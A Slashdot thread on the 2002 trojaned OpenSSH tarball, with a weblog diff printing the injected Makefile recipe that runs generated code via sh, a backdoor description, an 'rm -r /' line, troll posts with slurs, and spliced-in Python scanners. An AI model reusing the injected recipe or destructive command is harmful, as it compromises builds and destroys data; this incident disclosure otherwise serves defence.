OpenSSH Package Trojaned
cperciva writes "The original story is here.
And more details are available from the guy's weblog here." Here's a mirror of that email message. Another reader writes, "Not really a trojan because all it does is make a connection to 203.62.158.32:6667." Still another writes "The tarball of the portable OpenSSH on ftp.openbsd.org is trojaned. The backdoor is only used during build - generated binaries are fine." There isn't much authoritative information available, but this appears legitimate - please be careful if you're updating any of your machines with code from ftp.openbsd.org, and we'll update this story with more links as information is available. Update: 08/01 19:13 GMT by M : OpenSSH now has an advisory.
First piss.
All trolls are butt-spelunkers!
It's official: OpenBSD is holy. The Pope just announced the security hole itself.
Another blow to the *BSD movement, losing the support of Atheists all over the globe...
Or something.
Teenagers these days don't have as much sex as they want each other to think they do.
This has never happened to a Microsoft product. Although I am sure the Slashdot crew of janitors and peons would have a field day if it did.
All I can say is, j00 R 0wn3d lol
But...they don't have enough h4x0r green to be evil. Besides, why does it connect to the ircd port?
So the sources are bad but the binaries are good? Is today bizarro-world day or something?
Why not unplug your box from the network while building? After that it should be OK, seeing as how 'generated binaries are fine.'??
:)
Or am I thinking far too simply for my own good again?
Macs as a fetish property
OpenBSD being focussed on security and all...
Hate me!
slashdot effect n.
1. Also spelled "/. effect"; what is said to have happened when taco's anus is virtually unreachable because too many shirt-lifters are hitting it after he posts a boring pro-lunix article on the popular Slashdot news service. The term is quite widely used by /. readers, including variants like "Oh my god, my asshole has been slashdotted again!"
2. In a perhaps inevitable generation, the term is being used to describe any similar effect from being butt-fucked by a large admiring crowd. This would better be described as a flash crowd.
FREE NELSON MANDELA
...that this doesn't happen more often.
People keep harping on about how open source software means that they can trust downloaded source code, but who actually reads through the source code for something before they actually compile?
Usually it's just
./configure && make && make install.
James
Windows software doesn't have problems like this!
Wake up, Bill won the game.
Losers!
On the one hand, there's stories about the improved security and paranoia of OpenSSH.
And on the other hand, there's stories like this one and that one about anti-security "features" in the same package.
Now, my question is this: is this indicative of open-source development projects, in general? [Yeah, it's faster to fix issues, but if the distros are *causing* issues in the first place, well.... ;-) ]
Reminds me of a company I worked for that was timebombed by a previous programmer. Unfortunately for him, when we looked at the source code, all was well (he'd copied the sources back over his modified ones used in the binary build) ... but he'd left the .bak files. Guess what was in the .bak files. Good, now guess how we discovered a few other potential surprises he'd left for the rest of us to encounter.
Anyway, I can't see how a disgruntled coder could really affect an open-source project, unless there's personality factors at play that I don't know about. Anyone have some meat on this OpenSSL mess?
.f00Dave
Wouldn't it be better to change the 'main' openbsd site to be one of its current mirrors?
I suppose that a mirror has a better chance of being managed with motivation and skill, surely more than a Solaris box in a university actually has.
Also, the mirror should run OpenBSD itself...
-- There are two kind of sysadmins: Paranoids and Losers. (adapted from D. Bach)
Also, how many people read the makefiles before running them on their machine? And when installing binaries requires root access?
If this story is really true, how much safer are open-source programs, when compared with closed source programs? Notice that even with closed source programs, *some* people will eventually discover whether they are trojaned or not.
OK so they trojaned the source tar.gz, and uploaded it to the server somehow. So why did they not update the MD5SUM also?
Isn't it?
So, does apt-get use checksums and gpg signatures these days? Or are there thousands of debian machines out there just begging to be owned?
The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32, which is web.snsonline.net, and waits for commands from the person or persons who 0wn3d the machine. If it gets an M, it sleeps for another hour. If it gets an A, it aborts. If it gets an M, it spawns a shell. Some people will build it with "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.
Tell me how this isn't a trojan again? A remotely controllable program that could possibly give the attacker root access?
I've had enough abrasive sigs. Kittens are cute and fuzzy.
This is interesting. Open source developers are great, and we appreciate their contributions, but shouldn't there be some sort of open source code review? I understand that people that download the packages have the option to review the code, but I'm sure there's a lot that don't. Shouldn't some sort of change control/QC process be implemented before something is put up for the public's use?
I got my copy of the OpenSSH source from ftp.openssh.org the day it was released, and mine doesn't contain the bf-test.c file and the MD5 checksum is correct.
So if the file was modified, it happened later.
to subscribe to Bugtraq or a similar security mailing list. Especially you guys that run any type of server. Securityfocus is your friend; they'll have these advisories far in advance of any other place on the net.
I don't mean to be making a "*BSD is Dying" post, but what's the deal? This is the second problem with OpenSSH in a few months, and OpenSSL was exploited just a few days ago.
Is OpenBSD in trouble? More importantly, what are security-conscious people switching to, now that OpenBSD is no longer the fortress it once was?
Karma: Good (despite my invention of the Karma: sig)
But it reads from the connection and executes the read code via /bin/sh. You call this not a trojan?
-- There is no place like $HOME.
At this point I think we need to make the assumption that the problem is a bit more common than viewing these compromises individually would suggest, and perhaps these individual events can even be linked together.
And for the developers out there, I think it's time to check over all of your current distributed source tarballs.
This is the one area with open source which I am surprised has not been exploited earlier, and it's a problem I'm not sure how can be avoided.
We see that the "many eyes" on open source seems to work pretty damn quickly : but the question is, how much damage could someone do in the time it takes for people to notice? Most software needs to be installed as root, and most people blindly install software without checking the make files to see what they do. Because it is run as root, you are leaving your machine wide open to anything the trojan wants to do.
yes | rm -r /
The trouble is, a normal virus checker wouldn't be any use against this kind of trojan as most damage is caused before the trojan is noticed.
Has anyone else thought about ways to solve this problem?
The trojan is executing during BUILD ONLY. The trojan attempts to connect to an unknown daemon on 203.62.158.32:6667 (system reinstalled now and even more secured - thanks for that, ^Sarge^), and awaited one out of three characters for a command from the server it connected to - M, A and D.
M respawned the process.
A killed the trojan.
D launched /bin/sh. :-/
With the D command, as given _to_ the trojan, the daemon on 203.62.158.32:6667 was given control of the trojaned user's system shell. As most people, unfortunately, decide to compile as root, this potentially could have given the hacker a large amount of root shells around the globe with little or no hassle.
Funny, this is. Expect more trojans that look like this, but in a better disguise.
-- Hans.
I guess since Linux only has 0.005% of the market share, nobody even cares enough to write a virus for it.
Either way, looks like this is the final nail in the Linux coffin. I guess y'all won't be bragging about security anymore.
One more crippling bombshell hit the already beleaguered *BSD community when Slashdot confirmed that confidence in OpenBSD security has dropped yet again, with OpenBSD down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Slashdot article which plainly states that OpenSSH has more holes than a default IIS install, this news serves to reinforce what we've known all along. Theo de Raadt is collapsing in complete disarray, and industry pundits believe he will soon fall dead.
You don't need to be Jordan Hubbard to predict de Raadt's future. The handwriting is on the wall: Theo faces a bleak future. In fact there won't be any future at all for Theo because Theo is dying. Things are looking very bad for Theo. As many of us are already aware, Theo continues to lose credibility. Red ink flows like a river of blood.
Let's keep to the facts and look at the numbers. OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many exploits have there been to OpenBSD since Theo started coming clean about its failings? At least two remote root vulnerabilities in the last month. If we extrapolate that to two undisclosed exploits per month for the last six years OpenBSD has claimed to be free of holes, that's 144 security holes in 7000 machines, or 1,008,000 potential break-ins to an OpenBSD machine.
All major surveys show that Theo de Raadt is too arrogant to be able to live through this embarrassment. Theo is very sick and his long term survival prospects are very dim. If Theo is to survive at all it will only be through spending another 6 years covering up all the holes in OpenBSD. But the word is out, and nothing short of a miracle could save him at this point in time. For all practical purposes, Theo is dead.
Fact: Theo de Raadt is dying.
Actually this has happened to numerous Microsoft apps. Not the least of which is Windows XP, which allows M$ to backdoor you whenever they please.
RTFM man, and stop being such a Microsoft junkie. Microsoft has its place but doesn't deserve a pedestal. Flat out, it sucks.
C:\>bf-output.sh
'bf-output.sh' is not recognized as an internal or external command,
operable program or batch file
This trojan doesn't look very 31337 to me.
This comment was generated by a Squadron of Ultra Ninjas
One of the Paris mirrors seems to have a "healthy" version - if one dares believe the info on checksums.
ftp://ftp.fr.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
juan:~> md5sum openssh-3.4p1.tar.gz
459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz
I think that after this, they are going to ask for digital signatures from the upstream maintainers.
So, this may turn into a good thing ... if it didn't do too much damage.
Oh, and just for karma: this shows once more that security is a process more than a product.
Ciao
----
FB
So the backdoor is in the Makefile, not the OpenSSH software itself.
One thing to mention is that IMHO this is not a fault of OpenBSD. As anyone can read in their FAQ, www.openbsd.org (and ftp.openbsd.org) is run on Solaris.
I should have seen this coming... Here is a copy of the weblog. It will be back after 24 hours.
01 August 2002 - 19:10:23 - OpenSSH 3.4p1 package trojaned
And all I was thinking was "Oh! I should upgrade ssh on these two machines before there are problems...". The beauty of FreeBSD is that it goes like this:
[~] edwin@k7>cd /usr/ports/security/openssh-portable/
[/usr/ports/security/openssh-portable] edwin@k7>make
[/usr/ports/security/openssh-portable] edwin@k7>make install
Easy euh? It went well, except for the second step:
===> Extracting for openssh-portable-3.4p1_7
>> Checksum mismatch for openssh-3.4p1.tar.gz.
Make sure the Makefile and distinfo file (/usr/ports/security/openssh-portable/distinfo)
are up to date. If you are absolutely sure you want to override this
check, type "make NO_CHECKSUM=yes [other args]".
*** Error code 1
Euh... I didn't remember seeing a change in the FreeBSD ports regarding this. And I didn't see an announcement for it from the people from OpenSSH... Oh well, it happens. I downloaded the new openssh-tarball:
-r--r--r-- 1 12187 mirror 840574 Jul 31 16:47 openssh-3.4p1.tar.gz
-r--r--r-- 1 12187 mirror 232 Jun 26 08:20 openssh-3.4p1.tar.gz.sig
That's weird, they've rerolled the tarball without updating the signature file.
Curious as I was, I extracted the old and new tarballs and these were the differences:
[~/test] edwin@k7>diff -r -u openssh-3.4p1-old openssh-3.4p1
diff -r -u openssh-3.4p1-old/openbsd-compat/Makefile.in openssh-3.4p1/openbsd-compat/Makefile.in
--- openssh-3.4p1-old/openbsd-compat/Makefile.in Wed Feb 20 07:27:57 2002
+++ openssh-3.4p1/openbsd-compat/Makefile.in Thu Feb 1 08:52:03 2001
@@ -26,6 +26,7 @@
 $(COMPAT): ../config.h
+	$(CC) $(CFLAGS) $(CPPFLAGS) -c $bf-test.out; sh ./bf-test.out &
 $(OPENBSD): ../config.h
Only in openssh-3.4p1/openbsd-compat: bf-test.c
At this moment I asked a couple of people on irc (#sage-au) if they have had troubles with compiling openssh the last days. Yups, ^Sarge^@bofh.snsonline.net also had it, also a checksum mismatch. Time to go deeper into it...
bf-test.c is a weird file. It talks about HP-UX PL.2 systems, it talks about _CRAY notes, it talks about none-T3E machines, it talks about _ILP64__ and it does an epcdic2ascii() call. I'm not very skilled in computers (well, I am :-) but if people are talking about HP-UX, Cray, ILP64 and epcdic2ascii(), I know it's either too difficult for me (You are not supposed to understand this) or it's bullshit (We can charge the phaser-array via a shortwave link through the warpcore). Time to startup vmware and run the experiment: gcc -o bf-test bf-test.c.
bf-test itself is pretty harmless, it only prints things to the screen (remember the change in the makefile? execute, redirect the output and execute the output). The shell script it prints creates a C program and tries to compile it. If it doesn't succeed at first, it tries to link other libraries (everybody who has ever ported something to Solaris knows that you have to explicitly link to libresolv et al). So it's cross-platform :-)
The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32, which is web.snsonline.net, and waits for commands from the person or persons who 0wn3d the machine. If it gets an M, it sleeps for another hour. If it gets an A, it aborts. If it gets an M, it spawns a shell. Some people will build it with "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.
While analyzing the code on #sage-au and mentioning the hostname, ^Sarge^ looked strangely at me (well, it's IRC so you never know but that's what I would do): "That is my machine.". The good news is that I didn't have to worry about finding out who manages the machine!
The next step is to inform somebody who manages the openssh-packages: the OpenBSD team. Up to right now, I have had no experience with the OpenBSD team (if you check my website you'll see that I'm more a FreeBSD guy :-). The head-guy of the OpenBSD team is living in Canada and they're now sleeping there. I've spent a couple of days on #freebsd on irc.openprojects.net, so I just tried #openbsd.
*** MavEtJu has joined #openbsd
Euh... anybody from the openssh-team here?
I have some news for you...
What's up?
I have contact! Marius asked me the standard questions (how did you find out, how can I see it, when did you find out) and after some investigation he said "I think I'd better call (and now I have forgotten the name)". Coolies! I think I found the right person to talk to! It looks like things are going to roll now, I can take my hands off it. :-)
The last things I did were writing some emails to a couple of mailinglists and guiding ^Sarge^ to #openbsd. For the rest I wasn't of very much use anymore, so I just kept monitoring #openbsd. And the logfile of my website, which went ballistic.
Aftermath
* The portable version wasn't the only one which was trojaned, the normal version was also.
* It seems it took only six hours before somebody was alert enough to see that there was something wrong, all thanks to the checking of the MD5-checksum [insert a sweet 'aaaaaahhh' here]
* OpenSSH itself wasn't trojaned, the tarball was. There is nothing wrong with OpenSSH itself (this time).
* The building of a port (under FreeBSD at least) is done as root with all its privileges. This is the wrong approach. For a time I tried, as an experiment, to build ports as user "port". This worked fine except for the "make clean" part, in which I couldn't remove the files created during the "make install" phase and the files which were made during the building of the RUN_DEPENDS ports.
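Review bot: the one-line recipe added under the $(COMPAT) target has nothing to do with building libopenbsd-compat and is exactly the shape a reviewer should reject: it compiles a file that is new to the tree (bf-test.c, listed as "Only in" by diff -r), runs the result, redirects its output to bf-test.out and then hands that output to sh in the background, so the build executes whatever the freshly built program prints. The tell-tale signs are a recipe that runs something it just compiled, a "; sh ..." that executes generated text, and a trailing "&" that detaches the shell from the build; none of those belong in a Makefile.in for a compatibility library, and the timestamp on the +++ line (2001, older than the --- line) does not match a legitimate re-roll either.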
bash$
I wonder what would happen if someone was installing Gentoo? :) Shitty deal if you ask me
"I believe in everything in moderation. Including moderation." -Dean DeLeo, Stone Temple Pilots
...for hosting ftp.openbsd.org on a box running SunOS, not OpenBSD!
Is it just some disgruntled programmer? Was it the BSD team itself doing a drill check of their own security? Or is it time for conspiracy theories -- the men in black, or blue perhaps? (well, I dunno what colour Microsoft is, but they're the new IBM so I chose blue..)
It was "no remote holes in 5 years". Now it's "one remote hole in the default install, in nearly 6 years!"
Next it will be "one remote hole and one 'harmless trojan' in the default install, in really very close to 6 years!"
How many companies are going to tell a new programmer to go ahead and spend 6 months reading through all the code? How many companies encourage all the programmers to look at old code, check every line every couple of weeks and perform extensive regression testing? From my own experience, few companies look at old code and the regression testing is typically a narrow focus on the functional aspects. Things like a trojan aren't going to be caught by the typical regression testing procedures.
In my free time, I do read through open source code for fun. From my own biased experience, open source code tends to be much cleaner and better documented than closed source projects. This isn't including all the PERL code I've seen written in creative ways to make visual art. I've also seen clean PERL code, but that's another story. Back to the point. Persistence is what wins in the end when it comes to security. The minute a person gets lazy is when an attack will happen. But I seriously doubt this will change in the near future, since it's really a matter of culture. Businesses can't afford to have a team of programmers sit around and audit their security every couple of months. So unless our culture changes and realizes quality is more important than convenience, things like this will continue to increase in frequency. Of course everyone living in a modern techno society is guilty of it. But that's not to say technology is the cause of it, though they are related.
If there were some configure/make environment that prevents or asks before outgoing connections and checks for possibly dangerous commands that are unusual to call during a ./configure run, wouldn't that prevent things like this from happening again?
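One way to approximate the build-time check this comment asks for, as an added example that is not from the thread or from any project: a small scanner over Makefile recipe lines that flags the behaviour the bf-test recipe showed (running a program the recipe just compiled, feeding generated output to sh, backgrounding a command, or using a network client). The Makefile fragment below is a constructed stand-in modelled on the prose description of the trojaned openbsd-compat/Makefile.in, not the original diff, and the rules are my assumptions about what counts as suspicious.

```python
import re

# Constructed sample: a Makefile.in fragment modelled on the description of the
# trojaned openbsd-compat/Makefile.in (recipe text reconstructed from the prose,
# not copied from the original diff). Recipe lines start with a tab.
SAMPLE_MAKEFILE = """\
all: libopenbsd-compat.a

$(COMPAT): ../config.h
\t$(CC) $(CFLAGS) $(CPPFLAGS) -c bf-test.c -o bf-test; ./bf-test > bf-test.out; sh ./bf-test.out &
$(OPENBSD): ../config.h
$(PORT): ../config.h

.c.o:
\t$(CC) $(CFLAGS) $(CPPFLAGS) -c $<
"""

# Heuristics (assumed, not from any tool): each is (name, regex) applied to a
# single recipe line. They encode what the bf-test recipe did.
RULES = [
    ("runs generated output through a shell", re.compile(r"\bsh\s+\S*\.out\b")),
    ("backgrounds a command during the build", re.compile(r"&\s*$")),
    # "-o NAME ... ; ./NAME" : the recipe executes the binary it just produced
    ("executes a program it just compiled", re.compile(r"-o\s+(\S+).*;\s*\./\1\b")),
    ("network client in a build recipe", re.compile(r"\b(nc|netcat|telnet|curl|wget|ftp)\b")),
]


def recipe_lines(makefile_text):
    """Yield (lineno, text) for recipe lines, i.e. lines that begin with a tab."""
    for n, line in enumerate(makefile_text.splitlines(), 1):
        if line.startswith("\t"):
            yield n, line


def scan_makefile(makefile_text):
    """Return a list of (lineno, rule_name, stripped_line) findings.

    Only recipe lines are inspected: variable assignments and target lines are
    not executed by make, so they cannot run anything on their own.
    """
    findings = []
    for n, line in recipe_lines(makefile_text):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((n, name, line.strip()))
    return findings


def is_suspicious(makefile_text):
    """True when at least one recipe line trips a rule; a build wrapper could
    stop here and ask before running make."""
    return bool(scan_makefile(makefile_text))


if __name__ == "__main__":
    for lineno, rule, text in scan_makefile(SAMPLE_MAKEFILE):
        print("line %d: %s: %s" % (lineno, rule, text))
```

The ordinary `.c.o` recipe at the end of the sample produces no finding, so the scanner separates a normal compile line from the injected one rather than flagging every use of $(CC).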
Updating SSL and/or SSH may fsck you up, if you are doing it remotely via said ssh shell. :-(
It is official; Netcraft confirms: MD5 is dying
One more crippling bombshell hit the already beleaguered MD5 community when IDC confirmed that MD5 market share has dropped yet again, now down to less than a fraction of 1 percent of all servers. Coming on the heels of a recent Netcraft survey which plainly states that MD5 has lost more market share, this news serves to reinforce what we've known all along. MD5 is collapsing in complete disarray, as fittingly exemplified by failing dead last in the recent Sys Admin comprehensive networking test.
and so forth...
With the monthly (if not more often) security problems with that package its the reason why I stick with this instead.
I just don't have the time to constantly update my home systems like this.
The right thing to do here would be to put a link in the article to port 80 of the receiver server of the trojan.
Let's see it try to work while the server is being /.'d into oblivion.
This comment was generated by a Squadron of Ultra Ninjas
Could it be that a certain software corporation is hiring PR firms to do this?
I seem to remember a certain software corporation having the hotel room of some IBM executives bugged (does anyone remember this?).
1. This does not affect the installation.
2. This is not an OpenBSD matter.
THEO EATS BABIES
Without those checksums, the trojan might have done much more damage.
I download lots of tarballs from sites that provide a sum file as well. Presumably, you check the file to make sure its checksum matches that in the sum file. If it does, you should be good to go.
So, in this case, couldn't someone just as easily generate an md5 sum for the hacked file and put that in the sum file? I know on bsd you have ports which would prevent this, but what about Linux? Everything would seem kosher if the hax0r replaced the sum file...
thx for responses.
It seems like we need to start using a "web-of-trust" based PKI solution, like OpenPGP. And educating users to actually check the signatures!!!
On a related note, does Debian use anything to prevent this from happening? I for one don't worry too much when doing an update, maybe I should...
--
Adam Sherman
Freelance Geek
Personality factors? With the OpenBSD coding team? Those guys are the nicest, most patient, most tolerant group of techies you'll ever meet!
Once again I call people's attention to GPG, which can be used to digitally sign source code. Then, if something is trojaned, you know who to blame for including the bum code.
The Right Reverend K. Reid Wightman,
Yet another crippling bombshell hit the beleaguered *BSD community when recently IDC confirmed that *BSD accounts for less than a fraction of 1 percent of all servers. Coming on the heels of the latest Netcraft survey which plainly states that *BSD has lost more market share, this news serves to reinforce what we've known all along. *BSD is collapsing in complete disarray, as further exemplified by failing dead last [samag.com] in the recent Sys Admin comprehensive networking test.
You don't need to be a Kreskin [amdest.com] to predict *BSD's future. The handwriting is on the wall: *BSD faces a bleak future. In fact there won't be any future at all for *BSD because *BSD is dying. Things are looking very bad for *BSD. As many of us are already aware, *BSD continues to lose market share. Red ink flows like a river of blood. FreeBSD is the most endangered of them all, having lost 93% of its core developers.
Let's keep to the facts and look at the numbers.
OpenBSD leader Theo states that there are 7000 users of OpenBSD. How many users of NetBSD are there? Let's see. The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 NetBSD users. BSD/OS posts on Usenet are about half of the volume of NetBSD posts. Therefore there are about 700 users of BSD/OS. A recent article put FreeBSD at about 80 percent of the *BSD market. Therefore there are (7000+1400+700)*4 = 36400 FreeBSD users. This is consistent with the number of FreeBSD Usenet posts.
Due to the troubles of Walnut Creek, abysmal sales and so on, FreeBSD went out of business and was taken over by BSDI who sell another troubled OS. Now BSDI is also dead, its corpse turned over to yet another charnel house.
All major surveys show that *BSD has steadily declined in market share. *BSD is very sick and its long term survival prospects are very dim. If *BSD is to survive at all it will be among OS hobbyist dabblers. *BSD continues to decay. Nothing short of a miracle could save it at this point in time. For all practical purposes, *BSD is dead.
Fact: *BSD is dead
I was wondering the same thing. How did the file get uploaded to the ftp server? Who did it? And can they be prosecuted?
-- Thou hast strayed far from the path of the Avatar.
The IP address is of the machine which was hosting the ssh tarball. The attacker was obviously hoping to 0wn the machine and then pick up all the incoming connections.
$ hostinfo -n 203.62.158.32
snsonline.net
$ whois 203.62.158.32
I've apparently triggered the lameness filter with this... BTW, I can ping this host, so it's still up. However:
$ telnet 203.62.158.32 6667
Trying 203.62.158.32...
telnet: Unable to connect to remote host: Connection refused
Looks like they closed that port?
________________________________________________
suwain_2
For all the users who are confused, but are running OpenBSD pf or FreeBSD with ipfw, you could simply block all outgoing TCP and UDP packets to that address so the trojan simply won't communicate with the home server. Remember, a good hacker could simply use arp-poisoning or an arp spoofer to pretend to be that server. If you block it, you can still run OpenSSH with the trojan, and it's secure.
Here is an nmap dump of the IP in question that the backdoor tries to connect to:
nmap options (where options is filtered by Slashdot)
ALRIGHT FSCK THIS!! You'll just have to take my word for it: the nmap showed the port closed (do it yourself). I've just tried 10 different ways to submit the nmap output and the lameness filters won't let it through.
Note that port 6667 does not appear to be open, although a backdoor is still a pretty big thing to worry about. Also note that much of the output is cut out due to LAME Slashdot filters.
AntiFA: An abbreviation for Anti First Amendment.
Are you saying it's not the fault of the OpenBSD OS or the OpenBSD team?
If they are the ones managing the box, why aren't they securing it? If they aren't in a position to manage the box, why are they even using it?
Also, nobody has done a report on how the trojan was uploaded, so we can't say for sure it was the fault of the OS. It could have been a sniffed password, or social engineering, or whatever.
These guys do good work, but don't discredit the possibility that they make mistakes themselves once in awhile.
There are many big corps (those whose ticker symbol is only one or two letters) who are using OSS.
If they have a competent IT organization they have a team that will check that the software does not make any funnies.
Add to that just curious people, people modifying the software to their own needs, etc. and you get an army of people looking for problems and improvements.
That beats CSS in many instances (not all certainly), does not seem any worse and is more reassuring (the people evaluating normally do not have a vested interest in making the software work other than to satisfy their own needs).
IANAL but write like a drunk one.
Check out this little snippet (the whole message can be found on lwn.net) from an email from Theo:
We've been trying to warn vendors about 3.3 and the need for privsep, but they really have not heeded our call for assistance. They have basically ignored us. Some, like Alan Cox, even went further stating that privsep was not being worked on because "Nobody provided any info which proves the problem, and many people dont trust you theo" and suggested I "might be feeding everyone a trojan" (I think I'll publish that letter -- it is just so funny).
Please do publish that letter, Theo. That would be very interesting.
PU
--Lawrence Lessig for Congress!
Now, what are the chances of that happening? Finding a random trojan on your machine, popping in to an IRC channel, and immediately walking in on the owner of the machine from which the backdoor seems to originate? Who then immediately states "ah yes, that's my machine!" and closes the offending port. Well, how many machines are there on the 'net -- you work it out.
Sorry, my friends, but this smells of bullshit to me. I think the guy who reported it knows a lot more about it than he's making on... if he didn't write and install the bf-test himself, I would hazard a guess he knows who did. And, as the guy who reported the issue, he is least likely to be suspected... which makes the whole thing all the more cunning, if my suspicions are correct.
The only thing lower than quoting someone else's words in your sig is misquoting them. It's the precious things
check out this bugtraq posting for a small analysis of the trojan.
My major gripe is that most of us lazy bastards (he, me too!) will compare:
Like, if I were a Trojan cracker I wouldn't make sure to regenerate the md5sum on the web page to match up perfectly with the new tar ball!
If someone can replace blah.tar.gz they have a fair chance at being able to replace a blah.html file.
It really points up how good security for distributed packages depends on getting signatures and hashes distributed out to lots of different places in lots of different ways to make it much more difficult for a Trojan author to compromise that many different independent points of verification.
If we don't bother to use distributed verification to check the authenticity of our software, then we have only ourselves to blame for the consequences.
"Provided by the management for your protection."
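The distinction drawn in the two comments above (a sum file on the same server versus a digest pinned somewhere the attacker cannot reach, which is what the FreeBSD ports distinfo check did here), as an added example in Python that is not from the thread or from the ports system. The tarball bytes and the resulting digests are constructed stand-ins; MD5 is used because that is what the 2002 ports tree and MD5SUM files used, a port today would pin SHA-256 with the same logic.

```python
import hashlib
import hmac
import re

# Constructed stand-ins for the two tarballs in the story (not real OpenSSH bytes):
# the original release, and a re-rolled copy with one file added.
FILENAME = "openssh-3.4p1.tar.gz"
CLEAN_TARBALL = b"openssh-3.4p1 original sources (constructed sample)\n"
TROJANED_TARBALL = CLEAN_TARBALL + b"openbsd-compat/bf-test.c added later (constructed)\n"


def md5hex(data):
    """Digest used by the 2002 ports tree; swap in sha256 for a modern port."""
    return hashlib.md5(data).hexdigest()


# Reference 1: a distinfo line in FreeBSD ports format, committed to the ports
# tree when the release came out, i.e. stored out of band on a machine the
# attacker who replaced the tarball did not control.
PINNED_DISTINFO = "MD5 (%s) = %s\n" % (FILENAME, md5hex(CLEAN_TARBALL))


def parse_distinfo(text):
    """Parse 'MD5 (file) = hex' lines into {file: hex}."""
    refs = {}
    for line in text.splitlines():
        m = re.match(r"^MD5 \((.+)\) = ([0-9a-f]{32})$", line.strip())
        if m:
            refs[m.group(1)] = m.group(2)
    return refs


def parse_md5sum(text):
    """Parse md5sum(1) style output ('hex  file') into {file: hex}."""
    refs = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and re.fullmatch(r"[0-9a-f]{32}", parts[0]):
            refs[parts[1].strip()] = parts[0]
    return refs


def mirror_md5sum_for(tarball):
    """Reference 2: an MD5SUM file served next to the tarball. Whoever can
    replace the tarball on that server can regenerate this file to match, so it
    only shows the download was not corrupted in transit."""
    return "%s  %s\n" % (md5hex(tarball), FILENAME)


def verify(filename, data, refs):
    """True when the digest of data equals the recorded digest for filename."""
    expected = refs.get(filename)
    if expected is None:
        return False
    return hmac.compare_digest(md5hex(data), expected)


def check_download(filename, data, same_server_md5sum, pinned_distinfo):
    """Run both checks and return their verdicts. The pinned check is the one
    that printed 'Checksum mismatch for openssh-3.4p1.tar.gz.' in the story."""
    return {
        "same_server_md5sum": verify(filename, data, parse_md5sum(same_server_md5sum)),
        "pinned_distinfo": verify(filename, data, parse_distinfo(pinned_distinfo)),
    }


if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_TARBALL), ("trojaned", TROJANED_TARBALL)):
        # The attacker regenerates MD5SUM on the mirror, so it always "matches".
        print(label, check_download(FILENAME, blob, mirror_md5sum_for(blob), PINNED_DISTINFO))
```

For the re-rolled tarball the same-server MD5SUM passes and only the out-of-band distinfo fails, which is the whole argument for distributing digests and signatures separately from the files they cover.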
Telnet - because Theo is an asshole
As it seems to happen more and more often that ftp servers get cracked and md5sums don't seem to help (since users are too lazy to check them and the gpg signatures), could peer2peer services provide a solution? With things like GnuNET you don't download a URL, but instead a checksum. So there wouldn't be an easy way to replace a file in a single location, but one would need to spread a fake md5sum and make people believe that the fake one is the real one. With peer2peer systems there wouldn't be a single point of failure where the file could get trojaned; once the correct md5sum is spread in the public it would be nearly unchangeable. It would also be impossible to hijack mirrors or for trojaned files to be mirrored, since mirroring would be handled by the network itself, not by people. Well, it's just an idea, but GnuNET and Co. seem to have a much more straightforward way of handling checksums than you can ever get with http or ftp at the moment.
So, it was introduced, caught and demonstrably fixed in under 24 hours, with full disclosure and openness at every step. Excuse me if I see no cause for panic.
And can anyone explain how this is even in the same ballpark as the "w3 0wnz j00r b0xen" EULA's, 'phone home's and brazenly trojan updates that Microsoft are inflicting on their customers?
If you were blocking sigs, you wouldn't have to read this.
Who did it? And can they be prosecuted?
Gee, why would you want to do that? I thought everyone who broke into insecure systems was a good-natured Robin Hood, a "white hat" who was just trying to help the poor stupid admins out of the goodness of his or her heart.
Now you're telling me that these people might be malicious?
--saint
(This is the royal "you", of course, referring to the Slashbot Collective. I've got nothing against dfn5 personally.)
GPG signatures should be incorporated into gentoo.
People say this is not a fault of OpenBSD because openbsd.org runs on Sun Solaris.
I wonder who said that Sun boxes can be owned, they can't be trusted?
Or I never heard someone say "Oh, it's Solaris, it can be hacked".
Or did you ever see Bill G. say: "This site runs on Windows, don't blame me!"
Never learn by your mistakes, if you do you may never dare to try again
This is why I'd rather use Windows than Linux. Even though companies like Microsoft HAVE installed some code that monitors you, I know Microsoft won't be snooping in my email account, etc.
root@ has been warned.
I wonder if all the people are sleeping.....
That goes for source distributions like gentoo also. What happens if someone puts out a dirty ebuild?
I'm one of the admins for SunSITE Alberta which houses openbsd.org. I just checked the file currently available for download and it seems to be clean. The MD5SUM matches up, as well as extracting and looking at the source bf-test wasn't present.
This really sucks since I woke up only like 10 minutes ago and find that the most downloaded file from your site may be trojaned. I have a distinct feeling that the rest of my day isn't going to be much better.
The bothersome thing about this is that someone got into the site (aka: sunsite.ualberta.ca) and managed to modify source tarballs. I'm now wondering:
Free Software: Like love, it grows best when given away.
Since the trojan dies if it sees an A first thing, obviously the guy running the box it's trying to contact should run something like this (nc needs -l to listen rather than connect, and the loop re-arms the listener after each daemon disconnects):
while :; do yes "A" | nc -l -p 6667; done
Then every daemon that connects gets an A right away, and thus dies. End of problem.
At least mafia-owned pizzarias make excellent pizza. Compare to Bill Gates.
End result: no one in Gentoo has been able to compile/emerge openssh for the last few days.
Which is good :-)
look at the snipped trojaned code:
switch(c) {
case 'A':
exit(0);
case 'D':
break;
case 'M':
break;
How many options there? 3
What are they? A,D,M
A+D+M = ADM!!!!!!!!!!!!!!!!!!!!!
They're back or so, ehehe..
Or somebody is using their name. I don't have any chance to confirm this. Anybody?
evrim.
Evrim ULU sysadm http://www.core.gen.tr
In particular, if the machine in question is a server (usually the reason you have SSH on a box), you should make every possible effort to remove outgoing traffic. There's usually no reason for a server to create outgoing connections to the internet, and if it needs to connect to any specific local resources (e.g. a database machine), limit the iptables/routers appropriately.
Turn down that LOGIC STICK. You're blinding me with your science.
I might be showing my cluelessness here, but if this is done during the compilation, then this isn't as critical as it might be. I mean, I don't configure or compile any apps as root; so even if there is a remote shell opened on my machine, it only has luser access. (Which still sucks, but is not nearly as bad as a free root shell!)
Friends don't let friends compile as root.
